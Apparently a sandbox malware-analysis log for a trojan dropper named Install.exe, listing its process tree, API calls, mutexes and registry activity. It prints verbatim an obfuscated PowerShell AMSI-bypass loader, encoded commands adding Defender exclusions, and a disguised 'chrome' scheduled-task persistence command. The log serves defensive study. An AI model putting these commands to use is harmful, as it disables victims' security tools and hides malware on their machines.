Source: Install.exe, 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename34432.exe< vs Install.exe
Source: Install.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Install.exeFile created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeJump to behavior
Source: classification engineClassification label: mal100.troj.evad.winEXE@44/26@1/1
Source: C:\Users\user\Desktop\Install.exeFile read: C:\Users\desktop.iniJump to behavior
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140001000 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,RegOpenKeyExW,RegSetValueExW,22_2_0000000140001000
Source: Install.exeVirustotal: Detection: 41%
Source: Install.exeReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\Install.exeFile read: C:\Users\user\Desktop\Install.exeJump to behavior
Source: C:\Users\user\Desktop\Install.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Install.exe "C:\Users\user\Desktop\Install.exe"
Source: C:\Users\user\Desktop\Install.exeProcess created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Install.exeProcess created: C:\Users\user\AppData\Roaming\34432.exe C:\Users\user\AppData\Roaming\34432.exe
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Users\user\Desktop\Install.exeProcess created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeJump to behavior
Source: C:\Users\user\Desktop\Install.exeProcess created: C:\Users\user\AppData\Roaming\34432.exe C:\Users\user\AppData\Roaming\34432.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exitJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Users\user\Desktop\Install.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001000 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,CreateThread,Sleep,SleepEx,39_2_0000000140001000
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000E010 AdjustTokenPrivileges,39_2_000000014000E010
Source: C:\Users\user\AppData\Roaming\34432.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Install.exeFile created: C:\Users\user\AppData\Local\Temp\nsaDAE.tmpJump to behavior
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_004021AA CoCreateInstance,1_2_004021AA
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_0040498A
Source: C:\Users\user\AppData\Roaming\34432.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7020:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMutant created: \Sessions\1\BaseNamedObjects\9D16FBEF0D8A8F87529DE06A1C43C737
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2280:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6028:120:WilError_01
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
Source: 2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack, u000fu2001.csCryptographic APIs: 'CreateDecryptor'
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
Source: 5.2.AppLaunch.exe.400000.0.unpack, u000fu2001.csCryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
